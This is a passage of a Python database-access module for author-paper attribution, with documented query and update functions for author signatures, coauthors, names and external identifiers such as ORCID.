
    @param pid: author identifier
    @type pid: int

    @return: paper relevant data ((pid, bibref_table, bibref_value, bibrec, flag),)
    @rtype: tuple ((int, str, int, int, int),)
    '''
    return _select_from_aidpersonidpapers_where(select=['personid', 'bibref_table', 'bibref_value', 'bibrec', 'flag'], pid=pid)
def get_papers_of_author(pid, include_claimed=True, include_unclaimed=True, include_rejected=False): ### get_all_paper_records
    '''
    Gets all papers for the specific author. If 'include_claimed' flag is enabled
    it takes into account claimed papers. Additionally if
    'include_unclaimed' flag is enabled, it takes also into account unclaimed
    papers as well. Finally, if 'include_rejected' flag is enabled, it takes also
    into account rejected papers.

    @param pid: author identifier
    @type pid: int
    @param include_claimed: include a paper if it is claimed
    @type include_claimed: bool
    @param include_unclaimed: include unclaimed papers
    @type include_unclaimed: bool
    @param include_rejected: include rejected papers
    @type include_rejected: bool

    @return: records ((personid, bibref_table, bibref_value, bibrec, flag),)
    @rtype: set set((int, str, int, int, int),)
    '''
    # Build the optional flag restriction from the include_* switches.
    flag_conditions = []
    if include_claimed:
        flag_conditions.append("flag=2")
    if include_unclaimed:
        flag_conditions.append("(flag>-2 and flag<2)")
    if include_rejected:
        flag_conditions.append("flag=-2")

    where_str = ""
    if flag_conditions:
        where_str = " and ( %s )" % " or ".join(flag_conditions)

    query = ('select personid, bibref_table, bibref_value, bibrec, flag '
             'from aidPERSONIDPAPERS '
             'where personid=%s' + where_str)
    # BUGFIX: an unreachable 'return set()' after this return was removed.
    return set(run_sql(query, (pid,)))
def get_confirmed_papers_of_authors(pids): # get_all_papers_of_pids
    '''
    Yields all non-rejected rows of the given authors.

    @param pids: author identifiers
    @type pids: list [int,]

    @return: records ((personid, bibref_table, bibref_value, bibrec, flag),)
    @rtype: generator ((int, str, int, int, int),)
    '''
    if not pids:
        return ()

    query = ('select personid, bibref_table, bibref_value, bibrec, flag '
             'from aidPERSONIDPAPERS '
             'where personid in %s and flag > -2' % _get_sqlstr_from_set(pids))
    return iter(run_sql(query))
def get_confirmed_papers_of_author(pid): # get_person_bibrecs
    '''
    Gets all papers which are associated (non-negatively) to the given author.

    @param pid: author identifier
    @type pid: int

    @return: paper identifiers (duplicates removed)
    @rtype: list [int,]
    '''
    rows = run_sql('select bibrec '
                   'from aidPERSONIDPAPERS '
                   'where personid=%s and flag > -2', (str(pid),))
    return list(set(row[0] for row in rows))
def get_claimed_papers_of_author(pid): # get_claimed_papers
    '''
    Gets all signatures for the manually claimed papers of the given author.

    @param pid: author identifier
    @type pid: int

    @return: signatures ((bibref_table, bibref_value, bibrec),)
    @rtype: tuple ((str, int, int),)
    '''
    query = ('select bibref_table, bibref_value, bibrec '
             'from aidPERSONIDPAPERS '
             'where personid=%s and flag > %s')
    return run_sql(query, (pid, 1))
def get_claimed_papers_from_papers(recs):
    '''
    Given a set of papers it returns the subset of claimed papers.

    @param recs: paper identifiers
    @type recs: frozenset frozenset(int,)

    @return: claimed paper identifier rows
    @rtype: set set((int,),)
    '''
    query = ('select bibrec '
             'from aidPERSONIDPAPERS '
             'where bibrec in %s and flag=2' % _get_sqlstr_from_set(recs))
    return set(run_sql(query))
def get_rec_to_signatures_mapping():
    '''
    Builds a mapping from each paper identifier to all of its stored rows.

    @return: mapping bibrec -> [(personid, bibref_table, bibref_value, bibrec, name),]
    @rtype: defaultdict {int: list}
    '''
    rows = _select_from_aidpersonidpapers_where(
        select=['personid',
                'bibref_table',
                'bibref_value',
                'bibrec',
                'name'])
    mapping = defaultdict(list)
    for row in rows:
        mapping[int(row[3])].append(row)
    return mapping
def get_signatures_of_paper(rec): # get_signatures_from_rec
    '''
    Gets all records with the given paper identifier.

    @param rec: paper identifier
    @type rec: int

    @return: records with the given paper identifier ((pid, bibref_table, bibref_value, bibrec, name),)
    @rtype: tuple ((int, str, int, int, str),)
    '''
    fields = ['personid', 'bibref_table', 'bibref_value', 'bibrec', 'name']
    return _select_from_aidpersonidpapers_where(select=fields, rec=rec)
def get_status_of_signature(sig_str): # get_bibref_modification_status
    '''
    Gets the author-paper association status for the given signature.

    @param sig_str: signature (e.g. '100:7531,9024')
    @type sig_str: str

    @return: (flag, lcul) of the stored row, or (False, 0) when no row exists
    @rtype: tuple (int, int)
    '''
    if not sig_str:
        raise ValueError("A signature identifier is expected!")

    table, ref, rec = _split_signature_string(sig_str)
    rows = _select_from_aidpersonidpapers_where(select=['flag', 'lcul'],
                                                table=table, ref=ref, rec=rec)
    if rows:
        return rows[0]
    return (False, 0)
def get_author_and_status_of_signature(sig_str): # get_papers_status
    '''
    Gets the authors and the author-paper association status (for each author)
    of the paper referred to by the given signature.

    @param sig_str: signature (e.g. '100:7531,9024')
    @type sig_str: str

    @return: author identifiers and the author-paper association status
    @rtype: list [[(str, int, int), int, int],]
    '''
    sig = _split_signature_string(sig_str)
    rows = _select_from_aidpersonidpapers_where(select=['personid', 'flag'],
                                                table=sig[0], ref=sig[1], rec=sig[2])
    return [[sig, pid, flag] for pid, flag in rows]
def get_ordered_author_and_status_of_signature(sig): # get_signature_info
    '''
    Gets the author and the author-paper association status affiliated to the
    given signature, ordered by flag.

    @param sig: signature (bibref_table, bibref_value, bibrec)
    @type sig: tuple (str, int, int)

    @return: author identifier and author-paper association status
    @rtype: tuple ((int, int),)
    '''
    query = ('select personid, flag '
             'from aidPERSONIDPAPERS '
             'where bibref_table like %s '
             'and bibref_value=%s '
             'and bibrec=%s '
             'order by flag')
    return run_sql(query, sig)
def get_author_and_status_of_confirmed_paper(sig): # personid_from_signature
    '''
    Gets the confirmed author and author-paper association status affiliated to
    the given signature.

    @param sig: signature (bibref_table, bibref_value, bibrec)
    @type sig: tuple (str, int, int)

    @return: author identifier and author-paper association status
    @rtype: tuple ((int, int),)
    '''
    query = ('select personid, flag '
             'from aidPERSONIDPAPERS '
             'where bibref_table like %s '
             'and bibref_value=%s '
             'and bibrec=%s '
             'and flag > -2')
    rows = run_sql(query, sig)
    # A signature must be held by at most one author.
    assert len(rows) < 2, "More that one author hold the same signature: %s" % rows
    return rows
def get_author_info_of_confirmed_paper(sig): # personid_name_from_signature
    '''
    Gets the confirmed author and author name affiliated to the given
    signature.

    @param sig: signature (bibref_table, bibref_value, bibrec)
    @type sig: tuple (str, int, int)

    @return: author identifier and author name
    @rtype: tuple ((int, str),)
    '''
    query = ('select personid, name '
             'from aidPERSONIDPAPERS '
             'where bibref_table like %s '
             'and bibref_value=%s '
             'and bibrec=%s '
             'and flag > -2')
    rows = run_sql(query, sig)
    # A signature must be held by at most one author.
    assert len(rows) < 2, "More than one author hold the same signature: %s" % str(rows)
    return rows
def get_authors_of_claimed_paper(rec): # get_personids_from_bibrec
    '''
    Gets all the authors who are associated (non-negatively) with the given
    paper.

    @param rec: paper identifier
    @type rec: int

    @return: author identifiers
    @rtype: set set(int,)
    '''
    rows = run_sql('select personid '
                   'from aidPERSONIDPAPERS '
                   'where bibrec=%s '
                   'and flag > -2', (rec,))
    # An empty result naturally yields an empty set.
    return set(row[0] for row in rows)
def get_personid_signature_association_for_paper(rec):
    '''
    Maps each signature of the given paper ('table:ref' string) to the author
    it is non-negatively assigned to.

    @param rec: paper identifier
    @type rec: int
    @return: mapping {'bibref_table:bibref_value': personid}
    @rtype: defaultdict {str: int}
    '''
    data = run_sql("select personid, bibref_table, bibref_value from aidPERSONIDPAPERS where "
                   "bibrec = %s and flag > -2", (rec,))
    # NOTE(review): defaultdict(list) although values are plain ints — a
    # lookup of a missing key therefore yields []; callers may rely on that,
    # so it is left unchanged.
    associations = defaultdict(list)
    for i in data:
        associations[str(i[1]) + ':' + str(i[2])] = int(i[0])
    return associations
def get_coauthors_of_author(pid, excluding_recs=None): # get_coauthor_pids
    '''
    Gets the authors who are sharing papers with the given author excluding
    from the common papers the specified set.

    @param pid: author identifier
    @type pid: int
    @param excluding_recs: excluding paper identifiers
    @type excluding_recs: list [int,]

    @return: coauthor identifiers with the number of shared papers,
        most-shared first
    @rtype: list [(int, int),]
    '''
    recs = get_confirmed_papers_of_author(pid)

    if excluding_recs:
        exclude_set = set(excluding_recs)
        recs = set(recs) - exclude_set
    else:
        exclude_set = set()

    if not recs:
        return list()

    recs_sqlstr = _get_sqlstr_from_set(recs)
    pids = run_sql('select personid, bibrec '
                   'from aidPERSONIDPAPERS '
                   'where bibrec in %s '
                   'and flag > -2' % recs_sqlstr)
    # Drop the author himself and excluded papers; the set also collapses
    # multiple signatures of the same coauthor on one paper to one entry.
    pids = set([(int(p), int(r)) for p, r in pids if (int(p) != int(pid) and int(r) not in exclude_set)])
    # Count shared papers per coauthor; groupby requires the sorted list.
    pids = sorted([p for p, r in pids])
    pids = groupby(pids)
    pids = [(key, len(list(val))) for key, val in pids]
    pids = sorted(pids, key=itemgetter(1), reverse=True)
    return pids
def get_names_to_records_of_author(pid): # get_person_names_count
    '''
    Returns, for every name of the given author, the papers (bibrecs) on which
    that name appears. Rejected papers are excluded.

    @param pid: author identifier
    @type pid: int

    @return: mapping name -> paper identifiers
    @rtype: dict {str: list [int,]}
    '''
    rows = run_sql('select name, bibrec '
                   'from aidPERSONIDPAPERS '
                   'where personid=%s '
                   'and flag > -2', (pid,))
    recs_per_name = defaultdict(set)
    for name, rec in rows:
        recs_per_name[name].add(rec)
    return dict((name, list(recs)) for name, recs in recs_per_name.items())
def get_names_count_of_author(pid):
    '''
    Returns, for every name of the given author, the number of papers carrying
    that name.

    @param pid: author identifier
    @type pid: int

    @return: (name, paper count) pairs
    '''
    names_to_recs = get_names_to_records_of_author(pid)
    counts = dict((name, len(recs)) for name, recs in names_to_recs.items())
    return counts.items()
def _get_external_ids_from_papers_of_author(pid, limit_to_claimed_papers=False, force_cache_tables=False): # collect_personID_external_ids_from_papers
    '''
    Gets a mapping which associates an external system (e.g. Inspire) with the
    identifiers that the given author carries in that system (based on the
    papers he is associated with).

    @param pid: author identifier
    @type pid: int
    @param limit_to_claimed_papers: take into account only claimed papers
    @type limit_to_claimed_papers: bool
    @param force_cache_tables: NOTE(review): currently unused here — the marc
        caches are always populated below; confirm intended behaviour
    @type force_cache_tables: bool

    @return: mapping
    @rtype: dict {str: set(str,)}
    '''
    external_ids = dict()
    if bconfig.COLLECT_EXTERNAL_ID_INSPIREID:
        # flag > -2 selects all non-rejected rows; flag > 1 only claimed ones.
        flag = -2
        if limit_to_claimed_papers:
            flag = 1

        sigs = run_sql('select bibref_table, bibref_value, bibrec '
                       'from aidPERSONIDPAPERS '
                       'where personid=%s '
                       'and flag > %s', (pid, flag))
        records_to_cache = [x[2] for x in sigs]

#        if len(records_to_cache) >= bconfig.EXT_ID_CACHE_THRESHOLD:
        populate_partial_marc_caches(records_to_cache)

        inspire_ids = set()
        for sig in sigs:
            try:
                inspire_id = get_inspire_id_of_signature(sig)[0]
            except IndexError:
                # Signature carries no inspire id.
                inspire_id = None
            if inspire_id is not None:
                inspire_ids.add(inspire_id)

        external_ids[bconfig.PERSONID_EXTERNAL_IDENTIFIER_MAP['Inspire']] = inspire_ids

    return external_ids
def get_validated_request_tickets_for_author(pid, tid=None): # get_validated_request_ticket
    '''
    Gets the request tickets for the given author after it validates that their
    entries are correct. If an entry is incorrect it discards it.

    @param pid: author identifier
    @type pid: int
    @param tid: ticket identifier
    @type tid: int

    @return: validated request tickets (e.g. [[[('assign', '100:7531,9024'), ('reject', '100:7532,9025')], 1L],])
    @rtype: list [[[(str, str),], int],]
    '''
    request_tickets = get_request_tickets_for_author(pid, tid)
    for request_ticket in list(request_tickets):
        # Materialize the operations so entries can be removed while a copy
        # of the list is iterated.
        request_ticket['operations'] = list(request_ticket['operations'])
        for operation in list(request_ticket['operations']):
            action, bibrefrec = operation
            try:
                table, ref, rec = _split_signature_string(bibrefrec)
                present = bool(_select_from_aidpersonidpapers_where(select=['*'], table=table, ref=ref, rec=rec))
                if not present:
                    # The referenced signature no longer exists: drop the
                    # operation, and the whole ticket once it becomes empty.
                    request_ticket['operations'].remove(operation)
                    if not request_ticket['operations']:
                        remove_request_ticket_for_author(pid, tid=request_ticket['tid'])
            except: # no matter what goes wrong that's an invalid entry in the ticket. We discard it!
                request_ticket['operations'].remove(operation)

    return request_tickets
def get_authors_by_name_regexp(name_regexp): # get_all_personids_by_name
    '''
    Gets authors whose name matches the given SQL LIKE pattern.

    @param name_regexp: SQL regular expression
    @type name_regexp: str

    @return: authors whose name satisfies the pattern ((personid, name),)
    @rtype: tuple ((int, str),)
    '''
    query = ('select personid, name '
             'from aidPERSONIDPAPERS '
             'where name like %s '
             'and flag > -2 '
             'group by personid, name')
    return run_sql(query, (name_regexp,))
def get_authors_by_name(name, limit_to_recid=False, use_matchable_name=False): # find_pids_by_exact_name
    '''
    Gets all authors who have non-rejected rows with the specified name.

    @param name: author name
    @type name: str
    @param limit_to_recid: restrict the search to this paper identifier
    @type limit_to_recid: int
    @param use_matchable_name: compare against the m_name column instead of name
    @type use_matchable_name: bool

    @return: author identifiers
    @rtype: list [int,]
    '''
    name_column = 'm_name' if use_matchable_name else 'name'
    query = "select distinct(personid) from aidPERSONIDPAPERS where %s" % name_column

    # The two cases only differ in the optional bibrec restriction; the
    # duplicated query/return code of the original was folded together.
    if limit_to_recid:
        query += "=%s and bibrec=%s and flag>-2"
        args = (name, limit_to_recid)
    else:
        query += "=%s and flag>-2"
        args = (name,)

    return [pid[0] for pid in run_sql(query, args)]
def get_paper_to_author_and_status_mapping(): # get_bibrefrec_to_pid_flag_mapping
    '''
    Gets a mapping which associates signatures with author identifiers and the
    status of the author-paper association (of the paper that the signature is
    referring to).

    @return: mapping
    @rtype: defaultdict {(str, int, int): list [(int, int),]}
    '''
    mapping = defaultdict(list)
    sigs_authors = _select_from_aidpersonidpapers_where(
        select=['bibref_table', 'bibref_value', 'bibrec', 'personid', 'flag'])
    # Garbage collection is switched off while the (potentially huge) mapping
    # is built — presumably to speed up the mass of appends; TODO confirm the
    # pause is still worthwhile.
    gc.disable()
    for i in sigs_authors:
        sig = (i[0], i[1], i[2])
        pid_flag = (i[3], i[4])
        mapping[sig].append(pid_flag)
    gc.collect()
    gc.enable()
    return mapping
def get_author_to_papers_mapping(recs, limit_by_name=None): # get_personids_and_papers_from_bibrecs
    '''
    It finds the authors of the given papers and returns a mapping which
    associates each author with the set of papers he has affiliation with.
    If 'limit_by_name' is specified it will take into account only the authors
    who carry the specific surname.

    @param recs: paper identifiers
    @type recs: list [int,]
    @param limit_by_name: author surname
    @type limit_by_name: str

    @return: mapping, authors with most papers first
    @rtype: list [(int, set(int,)),]
    '''
    if not recs:
        return list()

    recs_sqlstr = _get_sqlstr_from_set(recs)
    if limit_by_name:
        # SECURITY FIX: the surname used to be quoted by string concatenation
        # ('"surname%"'), which broke on quotes inside the name and was open
        # to SQL injection; it is now bound as a query parameter.
        query = ('select personid, bibrec '
                 'from aidPERSONIDPAPERS '
                 'where bibrec in %s '
                 'and name like %%s' % recs_sqlstr)
        pids_papers = run_sql(query, (limit_by_name + '%',))
    else:
        pids_papers = run_sql('select personid, bibrec '
                              'from aidPERSONIDPAPERS '
                              'where bibrec in %s' % recs_sqlstr)

    # Group the papers per author (groupby requires sorted input), then order
    # the authors by how many of the given papers they hold.
    pids_papers = sorted(pids_papers, key=itemgetter(0))
    pids_papers = groupby(pids_papers, key=itemgetter(0))
    pids_papers = [(pid, set([tup[1] for tup in pid_paps])) for pid, pid_paps in pids_papers]
    pids_papers = sorted(pids_papers, key=lambda x: len(x[1]), reverse=True)

    return pids_papers
def get_author_to_confirmed_names_mapping(since=None): # get_all_modified_names_from_personid
    '''
    For all authors it gets the set of names from the papers each author is
    associated with. It excludes the names that come from rejected papers.
    If 'since' is specified, only authors with modified records after this date
    are taken into account.

    @param since: consider only authors with modified records after this date
    @type since: str

    @return: mapping
    @rtype: generator ((int, set([str,], int)),)
    '''
    args = list()
    add_arg = args.append

    query = ('select personid, name '
             'from aidPERSONIDPAPERS '
             'where flag > -2')
    if since:
        query += " and last_updated > %s"
        add_arg(since)

    pids_names = run_sql(query, tuple(args))

    if since:
        # An author modified after 'since' must still report ALL his names,
        # so re-query every name row of the affected authors.
        pids = set([pid for pid, _ in pids_names])
        pids_sqlstr = _get_sqlstr_from_set(pids)
        pids_names = run_sql('select personid, name '
                             'from aidPERSONIDPAPERS '
                             'where personid in %s '
                             'and flag > -2' % pids_sqlstr)

    res = dict()
    for pid, name in pids_names:
        try:
            # res[pid] holds [pid, set of names, number of name rows].
            res[pid][1].add(name)
            res[pid][2] += 1
        except KeyError:
            res[pid] = [pid, set([name]), 1]

    return (tuple(res[pid]) for pid in res.keys())
def get_all_modified_names_from_personid(since=None):
    '''
    For every author with at least one non-rejected row, yields the author
    identifier, the set of his names and the total number of name rows.
    If 'since' is given, only authors with rows updated after that date are
    considered.

    @param since: consider only authors with records modified after this date
    @type since: str

    @return: (personid, set of names, number of name rows) per author
    @rtype: generator ((int, set(str,), int),)
    '''
    if since:
        # BUGFIX: 'since' used to be %-interpolated straight into the SQL
        # string (unquoted -> broken query, injection-prone); bind it as a
        # parameter instead, as the sibling queries in this module do.
        all_pids = run_sql("SELECT DISTINCT personid "
                           "FROM aidPERSONIDPAPERS "
                           "WHERE flag > -2 "
                           "AND last_updated > %s", (since,))
    else:
        all_pids = run_sql("SELECT DISTINCT personid "
                           "FROM aidPERSONIDPAPERS "
                           "WHERE flag > -2 ")
    # Each 'p' is a (personid,) row and is passed straight through as the
    # parameter tuple of the per-author query.
    return ((name[0][0], set(n[1] for n in name), len(name))
            for name in (run_sql(
                         "SELECT personid, name "
                         "FROM aidPERSONIDPAPERS "
                         "WHERE personid = %s "
                         "AND flag > -2", p)
                         for p in all_pids))
def get_author_to_name_and_occurrence_mapping():
    '''
    Gets a mapping which associates authors with the set of names they carry
    and the number of times each name occurs in their papers.

    @return: mapping
    @rtype: dict {int: {str: int},}
    '''
    mapping = defaultdict(lambda: defaultdict(int))
    rows = run_sql('select personid, name '
                   'from aidPERSONIDPAPERS '
                   'where flag > -2')
    for pid, name in rows:
        mapping[pid][name] += 1
    return mapping
def get_name_to_authors_mapping(): # get_name_string_to_pid_dictionary
    '''
    Gets a mapping which associates names with the set of authors who carry
    each name.

    @return: mapping
    @rtype: dict {str: set(int,)}
    '''
    name_to_pids = defaultdict(set)
    for pid, name in _select_from_aidpersonidpapers_where(select=['personid', 'name']):
        name_to_pids[name].add(pid)
    return name_to_pids
def get_confirmed_name_to_authors_mapping():
    '''
    Gets a mapping which associates confirmed names with the set of authors who
    carry each name.

    @return: mapping
    @rtype: dict {str: set(int,)}
    '''
    name_to_pids = defaultdict(set)
    rows = run_sql('select personid, name '
                   'from aidPERSONIDPAPERS '
                   'where flag > -2')
    for pid, name in rows:
        name_to_pids[name].add(pid)
    return name_to_pids
def get_all_author_paper_associations(table_name='aidPERSONIDPAPERS'): # get_full_personid_papers
    '''
    Gets all author-paper associations (from aidPERSONIDPAPERS table or any
    other table with the same structure).

    @param table_name: name of the table with the author-paper associations;
        NOTE(review): interpolated directly into the SQL statement, so it must
        never come from untrusted input
    @type table_name: str

    @return: author-paper associations ((pid, bibref_table, bibref_value, bibrec, name, flag, lcul),)
    @rtype: tuple ((int, str, int, int, str, int, int),)
    '''
    return run_sql('select personid, bibref_table, bibref_value, bibrec, name, flag, lcul '
                   'from %s' % table_name)
def get_wrong_names():
    '''
    Detects names stored in aidPERSONIDPAPERS which no longer match the name
    recorded for the same bibref id in the bib10x/bib70x tables.

    @return: (iterator over wrong rows, total count); each row is
        (bibref_table, bibref_value, correct_name or None, stored_name)
    @rtype: tuple (iterator ((str, int, str, str),), int)
    '''
    bib100 = dict((name_id, name_value) for name_id, name_value in get_bib10x())
    bib700 = dict((name_id, name_value) for name_id, name_value in get_bib70x())

    aidpersonidpapers100 = set(_select_from_aidpersonidpapers_where(select=['bibref_value', 'name'], table='100'))
    aidpersonidpapers700 = set(_select_from_aidpersonidpapers_where(select=['bibref_value', 'name'], table='700'))

    # A row is wrong when the stored name differs from the current bib10x/70x
    # value (None when the bibref id does not exist any more).
    wrong100 = set(('100', nid, bib100.get(nid, None), nvalue) for nid, nvalue in aidpersonidpapers100
                   if nvalue != bib100.get(nid, None))
    wrong700 = set(('700', nid, bib700.get(nid, None), nvalue) for nid, nvalue in aidpersonidpapers700
                   if nvalue != bib700.get(nid, None))

    total = len(wrong100) + len(wrong700)

    return chain(wrong100, wrong700), total
def get_signatures_of_paper_and_author(sig, pid, include_rejected=False): # find_conflicts
    '''
    Gets the stored signatures of the given author on the paper referenced by
    'sig' (only the bibrec part of 'sig' is used in the lookup).

    @param sig: signature (bibref_table, bibref_value, bibrec)
    @type sig: tuple (str, int, int)
    @param pid: author identifier
    @type pid: int
    @param include_rejected: also return rows flagged as rejected
    @type include_rejected: bool

    @return: signatures ((bibref_table, bibref_value, bibrec, flag),)
    @rtype: tuple ((str, int, int, int),)
    '''
    rec = sig[2]
    base_query = """select bibref_table, bibref_value, bibrec, flag
               from aidPERSONIDPAPERS where personid=%s
               and bibrec=%s """
    if include_rejected:
        return run_sql(base_query, (pid, rec))
    return run_sql(base_query + 'and flag <> -2', (pid, rec))
def paper_affirmed_from_user_input(pid, sig_str): # person_bibref_is_touched_old
    '''
    Examines if the given author and the specified signature association has
    been affirmed from user input.

    @param pid: author identifier
    @type pid: int
    @param sig_str: signature (e.g. '100:7531,9024')
    @type sig_str: str

    @return: author and signature association is affirmed from user input
    @rtype: bool
    '''
    table, ref, rec = _split_signature_string(sig_str)
    rows = _select_from_aidpersonidpapers_where(select=['flag'], pid=pid,
                                                table=table, ref=ref, rec=rec)
    if not rows:
        return False

    flag = rows[0][0]
    # Touched means manually claimed (flag >= 2) or rejected (flag <= -2).
    return not -2 < flag < 2
def update_external_ids_of_authors(pids=None, overwrite=False, limit_to_claimed_papers=False, # update_personID_external_ids
                                   force_cache_tables=False): # TODO turn to True
    '''
    Updates the external ids for the given authors. If no authors are specified
    it does the updating for all authors. The possesion of an external id is
    determined by the papers an author is associated with.

    @param pids: author identifiers
    @type pids: list [int,]
    @param overwrite: deletes all existing ext ids and recalculates them from scratch
    @type overwrite: bool
    @param limit_to_claimed_papers: take into account only claimed papers
    @type limit_to_claimed_papers: bool
    @param force_cache_tables: use a caching mechanism for the calculation;
        NOTE(review): the collection call below always passes True regardless
        of this flag, which only controls the cache teardown — confirm intent
    @type force_cache_tables: bool
    '''
    if not pids:
        pids = set([i[0] for i in _select_from_aidpersonidpapers_where(select=['personid'])])

    for idx, pid in enumerate(pids):
        logger.update_status(float(idx) / float(len(pids)), "Updating external ids...")

        collected = _get_external_ids_from_papers_of_author(pid,
                                                            limit_to_claimed_papers=limit_to_claimed_papers,
                                                            force_cache_tables=True)
        # Skip authors with nothing collected, unless existing ids must be
        # wiped anyway.
        collected_ids_exist = False
        for external_id in collected.values():
            if external_id:
                collected_ids_exist = True
                break
        if not collected_ids_exist and not overwrite:
            continue

        present = get_external_ids_of_author(pid)

        if overwrite:
            for ext_system_id in present.keys():
                for ext_id in present[ext_system_id]:
                    _remove_external_id_from_author(pid, ext_system_id, ext_id)
            present = dict()

        # Add only the ids not already stored for this author.
        for ext_system_id in collected.keys():
            for ext_id in collected[ext_system_id]:
                if ext_system_id not in present or ext_id not in present[ext_system_id]:
                    add_external_id_to_author(pid, ext_system_id, ext_id, avoid_id_duplication=False)

        if force_cache_tables:
            destroy_partial_marc_caches()

    logger.update_status_final("Updating external ids finished.")
def _select_from_aidpersonidpapers_where(
        select=None,
        pid=None,
        table=None,
        ref=None,
        rec=None,
        name=None,
        flag=None,
        lcul=None):
    '''
    Selects the given fields from the records of aidPERSONIDPAPERS table
    with the specified attributes. If no filter is given it returns all
    records.

    @param select: fields to select
    @type select: list [str,]
    @param pid: author identifier
    @type pid: int
    @param table: bibref_table
    @type table: int
    @param ref: bibref_value
    @type ref: int
    @param rec: paper identifier
    @type rec: int
    @param name: author name
    @type name: str
    @param flag: author-paper association status
    @type flag: int
    @param lcul: lcul
    @type lcul: int

    @return: given fields of the records with the specified attributes
    @rtype: tuple
    '''
    if not select:
        return None

    # The constant 'True' keeps the where-clause valid when no filter at
    # all is requested.
    clauses = ['True']
    arguments = []
    optional_filters = (
        ('personid=%s', pid),
        ('bibref_table like %s', table if table is None else str(table)),
        ('bibref_value=%s', ref),
        ('bibrec=%s', rec),
        ('name=%s', name),
        ('flag=%s', flag),
        ('lcul=%s', lcul))
    for clause, value in optional_filters:
        if value is not None:
            clauses.append(clause)
            arguments.append(value)

    query = ('select %s '
             'from aidPERSONIDPAPERS '
             'where %s') % (", ".join(select), " and ".join(clauses))
    return run_sql(query, tuple(arguments))
#
#
# aidPERSONIDDATA table ###
#
#
# ********** setters **********#
def add_author_data(pid, tag, value, opt1=None, opt2=None, opt3=None):  # set_personid_row
    '''
    Stores one piece of data for the given author under the specified tag.

    @param pid: author identifier
    @type pid: int
    @param tag: data tag
    @type tag: str
    @param value: data tag value
    @type value: str
    @param opt1: opt1
    @type opt1: int
    @param opt2: opt2
    @type opt2: int
    @param opt3: opt3
    @type opt3: str
    '''
    query = ('insert into aidPERSONIDDATA (`personid`, `tag`, `data`, `opt1`, `opt2`, `opt3`) '
             'values (%s, %s, %s, %s, %s, %s)')
    run_sql(query, (pid, tag, value, opt1, opt2, opt3))
def remove_author_data(tag, pid=None, value=None):  # del_personid_row
    '''
    Deletes the data associated with the given tag. If 'pid' or 'value' are
    specified the deletion is restrained accordingly.

    @param tag: data tag
    @type tag: str
    @param pid: author identifier
    @type pid: int
    @param value: data tag value
    @type value: str
    '''
    # Collect only the restrictions the caller supplied and delegate
    # the actual delete to the shared helper.
    criteria = {'tag': tag}
    if pid:
        criteria['pid'] = pid
    if value:
        criteria['data'] = value
    _delete_from_aidpersoniddata_where(**criteria)
def transfer_data_to_author(data, new_pid):
    '''
    Reassigns existing aidPERSONIDDATA rows to another author.

    @param data: (personid, tag) pairs identifying the rows to move
    @type data: list [(int, str),]
    @param new_pid: new author identifier
    @type new_pid: int
    '''
    for pid, tag in data:
        run_sql('update aidPERSONIDDATA '
                'set personid=%s '
                'where personid=%s '
                'and tag=%s', (new_pid, pid, tag))
def add_orcid_id_to_author(pid, orcid_id):
    '''
    Adds the external identifier for ORCID system to the given author.

    @param pid: author identifier
    @type pid: int
    @param orcid_id: ORCID external identifier
    @type orcid_id: str
    '''
    # Thin wrapper: ORCID ids are stored like any other external id,
    # i.e. under the 'extid:ORCID' tag (see add_external_id_to_author).
    add_external_id_to_author(pid, 'ORCID', orcid_id)
def webuser_merge_user(old_uid, new_uid):
    '''
    Moves the author association from a merged-away web user to another.

    If some author currently holds 'old_uid' as his user id, that author is
    re-linked to 'new_uid'; otherwise nothing happens.

    @param old_uid: user identifier being merged away
    @type old_uid: int
    @param new_uid: surviving user identifier
    @type new_uid: int
    '''
    pid = run_sql("select personid from aidPERSONIDDATA where tag='uid' and data=%s", (old_uid,))
    if pid:
        add_userid_to_author(pid[0][0], new_uid)
def add_userid_to_author(pid, uid):
    """
    Connects a userid to an author. If a userid is already present on that person, it gets flagged as old and
    the new one will replace it. If another person has the same userid, it gets stolen.

    @param pid: author identifier
    @type pid: int
    @param uid: user identifier to attach
    @type uid: int
    """
    # Demote any uid currently held by this author to 'uid_old'.
    run_sql("update aidPERSONIDDATA set tag='uid_old' where tag='uid' and personid=%s", (pid,))
    # If another author already holds this uid, re-point that row to us
    # ("steal" it); otherwise insert a fresh row.
    pid_is_present = run_sql("select personid from aidPERSONIDDATA where tag='uid' and data=%s", (uid,))
    if not pid_is_present:
        run_sql("insert into aidPERSONIDDATA (personid, tag, data) values (%s, 'uid', %s)", (pid, uid))
    else:
        run_sql(
            "update aidPERSONIDDATA set personid=%s where personid=%s and tag='uid' and data=%s",
            (pid,
             pid_is_present[0][0],
             uid))
def add_arxiv_papers_to_author(arxiv_papers, pid):
    '''
    Stores the arxiv paper list of the given author, replacing an outdated
    one. The stored list is rewritten only when it differs (as a set) from
    the given one, so unchanged lists cause no write.

    @param arxiv_papers: arxiv paper identifiers
    @type arxiv_papers: list [str,]
    @param pid: author identifier
    @type pid: int
    '''
    stored = get_arxiv_papers_of_author(pid)
    if stored and set(stored) == set(arxiv_papers):
        return

    remove_arxiv_papers_of_author(pid)
    run_sql('insert into aidPERSONIDDATA (`personid`, `tag`, `datablob`) '
            'values (%s, %s, %s)', (pid, 'arxiv_papers', serialize(arxiv_papers)))
def remove_arxiv_papers_of_author(pid):
    '''
    Deletes the arxiv papers list of the specified author.

    @param pid: author identifier
    @type pid: int
    '''
    # The list is stored as a single serialized blob under the
    # 'arxiv_papers' tag, so one delete removes it entirely.
    run_sql('delete from aidPERSONIDDATA '
            'where tag=%s and personid=%s', ('arxiv_papers', pid))
def add_external_id_to_author(pid, ext_sys, ext_id, avoid_id_duplication=True):  ### add_personID_external_id
    '''
    Adds the external identifier of the specified system to the given author.

    @param pid: author identifier
    @type pid: int
    @param ext_sys: external system (e.g. 'INSPIREID', 'ORCID')
    @type ext_sys: str
    @param ext_id: external identifier
    @type ext_id: str
    @param avoid_id_duplication: skip the insert when the very same id is already stored
    @type avoid_id_duplication: bool
    '''
    # Build the tag once; it is used both for the duplicate check and the
    # insert (the original built it twice).
    tag = 'extid:%s' % ext_sys
    present = False
    if avoid_id_duplication:
        present = run_sql('select data from aidPERSONIDDATA where personid=%s and tag=%s and data=%s',
                          (pid, tag, ext_id))
    if not present:
        run_sql('insert into aidPERSONIDDATA (personid, tag, data) '
                'values (%s, %s, %s)', (pid, tag, ext_id))
def _remove_external_id_from_author(pid, ext_sys, ext_id=None):  # remove_personID_external_id
    '''
    Removes all identifiers of the specified external system from the given
    author. If 'ext_id' is specified only that identifier is removed.

    @param pid: author identifier
    @type pid: int
    @param ext_sys: external system
    @type ext_sys: str
    @param ext_id: external identifier
    @type ext_id: str
